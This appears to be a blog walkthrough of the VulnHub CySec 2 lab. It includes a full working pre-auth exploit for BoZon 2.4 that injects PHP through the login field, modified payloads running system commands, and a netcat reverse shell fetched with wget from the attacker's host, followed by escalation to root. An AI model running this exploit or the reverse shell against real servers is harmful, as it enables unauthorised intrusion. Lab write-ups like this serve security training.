al1z4deh.medium.com

VulnHub: CySec: 2

Al1z4deh:~# echo "Welcome"

Today we will take a look at Vulnhub: CySec 2. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open --open 192.168.0.115

22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b1:00:57:62:be:65:42:f0:ba:3e:c1:47:c5:8d:fb:db (RSA)
| 256 5a:9b:20:89:19:c3:ab:d4:be:06:84:de:e4:30:d4:37 (ECDSA)
|_ 256 08:4b:f3:f8:88:7e:1a:6b:e1:8d:7f:14:60:10:7a:98 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
3306/tcp  open  mysql   MySQL (unauthorized)
33060/tcp open  mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
  • Web

When we look at the source of the page, we see a base64-encoded sentence. Let’s decode it with CyberChef.

view-source:http://192.168.0.115/

Zm9yIGZpcnN0IGZsYWcgY2hlY2sgL2NoYWxsZW5nZS9pbmRleC5waHAKZm9yIHNlY29uZCBmbGFnIGNoZWNrIC9FeG9saXQvaW5kZXgucGhw
for first flag check /challenge/index.php
for second flag check /Exolit/index.php

When we look at /Exolit/index.php, we see that it runs BoZon version 2.4. After searching, we find the following exploit.

  • Exploit

# Python 2 script (urllib2, raw_input); run it with python2 as shown below.
import urllib,urllib2,time

#Bozon v2.4 (bozon.pw/en/) Pre-Auth Remote Exploit
#Discovery / credits: John Page - Hyp3rlinx/Apparition
#hyp3rlinx.altervista.org
#Exploit: add user account | run phpinfo() command
#=========================================================

EXPLOIT=0
IP=raw_input("[Bozon IP]>")
EXPLOIT=int(raw_input("[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()"))

if EXPLOIT==1:
    CMD="Apparition"
else:
    # The login value is written into a PHP file unescaped, so this string
    # breaks out of the literal and becomes PHP code.
    CMD='"];$PWN=''phpinfo();//''//"'

if EXPLOIT != 0:
    url = 'http://'+IP+'/Exolit/index.php'
    data = urllib.urlencode({'creation' : '1', 'login' : CMD, 'pass' : 'abc123', 'confirm' : 'abc123', 'token' : ''})
    req = urllib2.Request(url, data)

    response = urllib2.urlopen(req)
    if EXPLOIT==1:
        print 'Apparition user account created! password: abc123'
    else:
        print "Done!... waiting for phpinfo"
        time.sleep(0.5)
        print response.read()

Before the second option is useful, we first need an account. So let’s select 1, create a user and log in.

└─$ python2 exploit.py
[Bozon IP]>192.168.0.115
[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()1
Apparition user account created! password: abc123

Let’s enter.

username: Apparition

password: abc123

When we run the exploit again with the second option and refresh the page, we see the phpinfo() output.

This is the line in the exploit that does this:

CMD='"];$PWN=''phpinfo();//''//"'

Let’s change it so that it runs a system command instead:

CMD='"];system("ls -la");//''//"'

After changing this line, run the exploit again and select the second option. Then refresh the page.


The command has been executed.

“You can contact me if you have any questions.”

  • Reverse shell

Let’s prepare a reverse shell payload called reverse.sh:

#!/bin/bash

nc -e /bin/sh YourIP 1234

Now let’s fetch it on the target side.

Local machine

Command: python3 -m http.server 80

In the exploit (two separate runs: first download the script, then execute it)

CMD='"];system("wget http://YourIP/reverse.sh");//''//"'

CMD='"];system("bash reverse.sh");//''//"'

Local machine

nc -nvlp 1234

After listening, let’s refresh the page and get the shell.

  • CySec2

If we look at the flag.txt file, we can find the password for cysec2.

Command: cat flag.txt

username = cysec2 
password = $^WAhuy457i6kj

Command: su cysec2

  • Root

Check privileges

Command: sudo -l

(ALL : ALL) ALL

Command: sudo su

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”